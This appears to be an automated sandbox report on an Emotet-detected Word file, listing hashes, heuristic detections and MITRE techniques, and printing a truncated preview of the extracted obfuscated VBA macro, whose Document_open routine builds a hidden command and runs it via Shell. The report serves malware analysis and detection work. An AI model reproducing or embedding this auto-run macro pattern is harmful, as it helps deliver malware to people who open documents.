Emotet Office (OLE) malware analysis — malicious · c819d003dade9cfa

MALICIOUS

Office (OLE)

183.8 KB Created: 2018-07-18 13:01:00 Authoring application: Microsoft Office Word First seen: 2018-07-27

MD5: f5063c82bc2ccbebe7fd0e5588281463 SHA-1: fa2c679451e88a76e728a76b36ef6bbeb6678425 SHA-256: c819d003dade9cfa3f34cfa65dba1ee289031e5687cd6345aec81f8aa56258d9

182 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file contains VBA macros, including a Document_Open macro, which is a common technique for Emotet. The critical heuristic firing for a Shell() call in VBA indicates that the macro is designed to execute external commands. ClamAV detection further confirms the Emotet family and its downloader functionality. The embedded URL was benign, but the presence of the shell command strongly suggests a payload download.

Heuristics 5

ClamAV: Doc.Downloader.Emotet-6878583-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6878583-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 37492 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	37492 bytes
SHA-256: `94e7dc1bbc6b42aca35b488a38dfac38885419166e0034701272941c149cc3cd`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "BoDWAjunPI" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function YtXHIzv() On Error Resume Next EqZJO = (16107 * 14329) / bWcMQR * 75706 + 69526 / TVYnJ * 69924 * dQTVc - SqdzV + 59518 JnIrk = (10441 * 45251) / QjSaYm * 43425 + 20431 / EoPXI * 13002 * jcuTUO - BSzLs + 81787 JKqHj = (52455 * 89885) / HckXmi * 50112 + 88238 / vGUjwo * 73453 * QDmiQ - IcTJLh + 60818 OtPVz = (97254 * 42263) / pwzqdr * 24081 + 71845 / jQKIK * 7801 * CXQHb - dUXDaW + 16369 sKsFW = (40771 * 46085) / KGLKLZ * 74949 + 85917 / pvTbi * 28363 * OSfSa - pcOZY + 99727 End Function Private Function PUkYuiQ() On Error Resume Next wlWtVh = (55528 * 83833) / iHpfu * 36189 + 97782 / wbWzMs * 9509 * BNVada - dzjGvD + 22492 fRnDBa = (84963 * 1253) / MzNdC * 85768 + 60586 / RhnzBE * 31238 * VOzMj - orcVB + 62847 hNrPMk = (51249 * 34570) / CipWm * 74306 + 86874 / ATTHQ * 62995 * SLfKM - okcmR + 96797 GLRFS = (25580 * 98863) / mswKA * 33294 + 27034 / iMWzfM * 89341 * WsIVAh - wXCabj + 92106 GwbFQ = (47965 * 38758) / dkqpJ * 11621 + 67127 / RdiaEi * 48116 * Bznwq - LiaTrj + 70637 zYlrP = (83146 * 2461) / RThKCN * 22049 + 97012 / XXESlV * 62646 * ZHPpOz - cFkCS + 73686 End Function Private Function wipFAPQRukKW() On Error Resume Next TfKvj = (82481 * 7503) / FHtQjw * 74163 + 3284 / cwHwom * 56045 * szAkh - uIPut + 26261 dMdVs = (68408 * 65457) / jzPAj * 42046 + 80228 / aDApL * 55170 * SmEOm - ucOnPE + 58597 OdIYhL = (70281 * 62435) / fsziY * 48838 + 31246 / thiqtC * 9779 * rzHTB - ojvkio + 30991 QjqijO = (23171 * 30783) / KRodIi * 46999 + 69357 / cuRiG * 98095 * FGWki - SwjjMZ + 46060 MoJiYT = (73418 * 84350) / NFPEk * 29732 + 29529 / AzKjn * 40149 * hoXBMR - LEtqM + 61768 tjuzB = (62980 * 47785) / rzYIEf * 11376 + 96673 / TOwkw * 71254 * qwuKKt - jZwFi + 77413 OIzjB = (77587 * 15489) / jwuRs * 34495 + 70203 / zvPGF * 73383 * fzvpj - ZbKiA + 99004 End Function Private Sub Document_open() On Error Resume Next XGhIl = Tcliih * bXOck + zWacI * Owmwtt + 61978 * QFmsL / (2865 / kXdqJ / 40552 + qOqUW) DWpzv = 61829 - PYDrAh / ldsaUm - EAOUn - 5493 * RmFzHB uKwUMH = MWQsbV * vjBEcq + jvSbv * sYAKJI + 54173 * PZmto / (43826 / KWfmJW / 97173 + rFQCR) KtnKn = PrOjv * joVCJJ + pYQir * aFmisT + 5340 * LvZVH / (10465 / zHjnYO / 60595 + tGsJt) VwzraW = fJWRN * uoMbCj + XKFLj * JBnumW + 69854 * GSJSs / (19665 / zuXUr / 23490 + PIBST) Shell "" + wdZiWnjirkzWGV + QjCOzzmwIF + CVar("c") + HZXwbRJJTj + DtmFLwDUdVD + FnzJb + LmdHwOV + wnGKWS + FRKSlZnRE + FWzwjXhGAUA + QImLcEDKSDA + OGBtPAjqXNN + wpWBGS + wiClusZf + fpUtCdCOW + sTowj + ArTRlRLTA + RmCOWw + tQSjoWGjTtq + OLnTWZYm, 0 YzEUkI = BFmLjJ * YdPNnT + aZSTfn * QSWFaj + 15719 * XViksG / (54210 / izpRUH / 1380 + SUiwZ) hjKPXP = KDowX * RaPFFh + nFHLLC * wiBjKM + 27356 * jqbqT / (85796 / Ihltj / 98028 + slQnG) SuzIEs = KrAvt * WnGnQw + QjSSc * civkqr + 9576 * zpoNBr / (25534 / ziMViR / 62756 + lHqVV) End Sub Private Function AuURwWzAuIDSz() On Error Resume Next WGIOz = zAAPoj * qFazz + cQPiJ * iHBnv + 65572 * owwPtq / (43122 / iCDal / 54874 + hqmZB) bVOFG = dquAu * LMETdS + IUpmJV * LPzaI + 54591 * qujwi / (42184 / jvufwc / 71977 + vKcMOK) jHoPjT = sVcok * ajGjO + hVHfSA * NWPihn + 80382 * PWBMkc / (67050 / mpjrF / 93611 + AiGfN) PvFbrY = oOKiC * jXNwI + robPzn * rkRVpC + 26502 * XwiqbQ / (93036 / FHSUb / 33009 + uGKUa) brqLdu = VwEFh * bcERY + TUUjc * fwAUj + 31510 * ISVBE / (38612 / bDEqZ / 22492 + YvMZwZ) iEjqpN = UsSLUR * VzwQZ + vHNti * TpwwN + 13085 * Iztvfs / (41467 / amiQR / 63528 + odPzk) End Function Private Function kSfmuin() On Error Resume Next FCTij = aUUKwm * iqUwZH + zbEIRY * JjKIJj + 15985 * aiBoW / (59626 / nutWA / 80810 + EkPdLI) TJqBE = MHuSzl * TjtWt + jJAbK * dIrzv + 61838 * HcwjU / (27509 / cIErJ / 72134 + UYhpl) wKrhGM = ... (truncated)

SHA-256: 94e7dc1bbc6b42aca35b488a38dfac38885419166e0034701272941c149cc3cd

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "BoDWAjunPI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function YtXHIzv()
On Error Resume Next
   EqZJO = (16107 * 14329) / bWcMQR * 75706 + 69526 / TVYnJ * 69924 * dQTVc - SqdzV + 59518
   JnIrk = (10441 * 45251) / QjSaYm * 43425 + 20431 / EoPXI * 13002 * jcuTUO - BSzLs + 81787
   JKqHj = (52455 * 89885) / HckXmi * 50112 + 88238 / vGUjwo * 73453 * QDmiQ - IcTJLh + 60818
   OtPVz = (97254 * 42263) / pwzqdr * 24081 + 71845 / jQKIK * 7801 * CXQHb - dUXDaW + 16369
   sKsFW = (40771 * 46085) / KGLKLZ * 74949 + 85917 / pvTbi * 28363 * OSfSa - pcOZY + 99727
End Function
Private Function PUkYuiQ()
On Error Resume Next
   wlWtVh = (55528 * 83833) / iHpfu * 36189 + 97782 / wbWzMs * 9509 * BNVada - dzjGvD + 22492
   fRnDBa = (84963 * 1253) / MzNdC * 85768 + 60586 / RhnzBE * 31238 * VOzMj - orcVB + 62847
   hNrPMk = (51249 * 34570) / CipWm * 74306 + 86874 / ATTHQ * 62995 * SLfKM - okcmR + 96797
   GLRFS = (25580 * 98863) / mswKA * 33294 + 27034 / iMWzfM * 89341 * WsIVAh - wXCabj + 92106
   GwbFQ = (47965 * 38758) / dkqpJ * 11621 + 67127 / RdiaEi * 48116 * Bznwq - LiaTrj + 70637
   zYlrP = (83146 * 2461) / RThKCN * 22049 + 97012 / XXESlV * 62646 * ZHPpOz - cFkCS + 73686
End Function
Private Function wipFAPQRukKW()
On Error Resume Next
   TfKvj = (82481 * 7503) / FHtQjw * 74163 + 3284 / cwHwom * 56045 * szAkh - uIPut + 26261
   dMdVs = (68408 * 65457) / jzPAj * 42046 + 80228 / aDApL * 55170 * SmEOm - ucOnPE + 58597
   OdIYhL = (70281 * 62435) / fsziY * 48838 + 31246 / thiqtC * 9779 * rzHTB - ojvkio + 30991
   QjqijO = (23171 * 30783) / KRodIi * 46999 + 69357 / cuRiG * 98095 * FGWki - SwjjMZ + 46060
   MoJiYT = (73418 * 84350) / NFPEk * 29732 + 29529 / AzKjn * 40149 * hoXBMR - LEtqM + 61768
   tjuzB = (62980 * 47785) / rzYIEf * 11376 + 96673 / TOwkw * 71254 * qwuKKt - jZwFi + 77413
   OIzjB = (77587 * 15489) / jwuRs * 34495 + 70203 / zvPGF * 73383 * fzvpj - ZbKiA + 99004
End Function
Private Sub Document_open()
On Error Resume Next
   XGhIl = Tcliih * bXOck + zWacI * Owmwtt + 61978 * QFmsL / (2865 / kXdqJ / 40552 + qOqUW)
   DWpzv = 61829 - PYDrAh / ldsaUm - EAOUn - 5493 * RmFzHB
   uKwUMH = MWQsbV * vjBEcq + jvSbv * sYAKJI + 54173 * PZmto / (43826 / KWfmJW / 97173 + rFQCR)
   KtnKn = PrOjv * joVCJJ + pYQir * aFmisT + 5340 * LvZVH / (10465 / zHjnYO / 60595 + tGsJt)
   VwzraW = fJWRN * uoMbCj + XKFLj * JBnumW + 69854 * GSJSs / (19665 / zuXUr / 23490 + PIBST)
Shell "" + wdZiWnjirkzWGV + QjCOzzmwIF + CVar("c") + HZXwbRJJTj + DtmFLwDUdVD + FnzJb + LmdHwOV + wnGKWS + FRKSlZnRE + FWzwjXhGAUA + QImLcEDKSDA + OGBtPAjqXNN + wpWBGS + wiClusZf + fpUtCdCOW + sTowj + ArTRlRLTA + RmCOWw + tQSjoWGjTtq + OLnTWZYm, 0
   YzEUkI = BFmLjJ * YdPNnT + aZSTfn * QSWFaj + 15719 * XViksG / (54210 / izpRUH / 1380 + SUiwZ)
   hjKPXP = KDowX * RaPFFh + nFHLLC * wiBjKM + 27356 * jqbqT / (85796 / Ihltj / 98028 + slQnG)
   SuzIEs = KrAvt * WnGnQw + QjSSc * civkqr + 9576 * zpoNBr / (25534 / ziMViR / 62756 + lHqVV)
End Sub
Private Function AuURwWzAuIDSz()
On Error Resume Next
   WGIOz = zAAPoj * qFazz + cQPiJ * iHBnv + 65572 * owwPtq / (43122 / iCDal / 54874 + hqmZB)
   bVOFG = dquAu * LMETdS + IUpmJV * LPzaI + 54591 * qujwi / (42184 / jvufwc / 71977 + vKcMOK)
   jHoPjT = sVcok * ajGjO + hVHfSA * NWPihn + 80382 * PWBMkc / (67050 / mpjrF / 93611 + AiGfN)
   PvFbrY = oOKiC * jXNwI + robPzn * rkRVpC + 26502 * XwiqbQ / (93036 / FHSUb / 33009 + uGKUa)
   brqLdu = VwEFh * bcERY + TUUjc * fwAUj + 31510 * ISVBE / (38612 / bDEqZ / 22492 + YvMZwZ)
   iEjqpN = UsSLUR * VzwQZ + vHNti * TpwwN + 13085 * Iztvfs / (41467 / amiQR / 63528 + odPzk)
End Function
Private Function kSfmuin()
On Error Resume Next
   FCTij = aUUKwm * iqUwZH + zbEIRY * JjKIJj + 15985 * aiBoW / (59626 / nutWA / 80810 + EkPdLI)
   TJqBE = MHuSzl * TjtWt + jJAbK * dIrzv + 61838 * HcwjU / (27509 / cIErJ / 72134 + UYhpl)
   wKrhGM =
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.